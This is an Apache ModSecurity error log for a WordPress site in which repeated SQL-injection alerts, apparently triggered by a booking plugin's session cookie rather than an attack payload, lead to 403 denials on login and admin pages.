[Mon May 11 18:30:47.267789 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIENw-Qm4vhlWBPlMjllQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:48.009856 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIENw-Qm4vhlWBPlMjllQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:48.121747 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEOA-Qm4vhlWBPlMjllwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:48.122044 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEOA-Qm4vhlWBPlMjllwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:49.103017 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEOA-Qm4vhlWBPlMjllwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:49.221340 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEOQ-Qm4vhlWBPlMjlmAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:49.221614 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEOQ-Qm4vhlWBPlMjlmAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:49.842814 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEOQ-Qm4vhlWBPlMjlmAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:50.317041 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEOg-Qm4vhlWBPlMjlmgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:50.317340 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEOg-Qm4vhlWBPlMjlmgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:51.254066 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEOg-Qm4vhlWBPlMjlmgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:51.492809 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEOw-Qm4vhlWBPlMjlnAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:51.493138 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEOw-Qm4vhlWBPlMjlnAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:52.507934 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEOw-Qm4vhlWBPlMjlnAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:52.831114 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEPA-Qm4vhlWBPlMjlngAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:52.831413 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEPA-Qm4vhlWBPlMjlngAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:56.422373 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEPA-Qm4vhlWBPlMjlngAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:56.730550 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEQA-Qm4vhlWBPlMjlqgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:56.730837 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEQA-Qm4vhlWBPlMjlqgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:57.671387 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEQA-Qm4vhlWBPlMjlqgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:57.872918 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEQQ-Qm4vhlWBPlMjlqwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:57.873218 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEQQ-Qm4vhlWBPlMjlqwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:58.808377 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEQQ-Qm4vhlWBPlMjlqwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:58.911964 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEQg-Qm4vhlWBPlMjlrgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:58.912263 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEQg-Qm4vhlWBPlMjlrgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:59.474506 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEQg-Qm4vhlWBPlMjlrgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:00.008822 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIERA-Qm4vhlWBPlMjlsAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:00.009265 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIERA-Qm4vhlWBPlMjlsAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:00.962454 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIERA-Qm4vhlWBPlMjlsAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:01.236287 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIERQ-Qm4vhlWBPlMjlsQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:01.236578 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIERQ-Qm4vhlWBPlMjlsQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:02.033355 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIERQ-Qm4vhlWBPlMjlsQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:02.394907 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIERg-Qm4vhlWBPlMjltAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:02.395222 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIERg-Qm4vhlWBPlMjltAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:03.466453 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIERg-Qm4vhlWBPlMjltAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:03.743495 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIERw-Qm4vhlWBPlMjltQAAAAM"], referer: 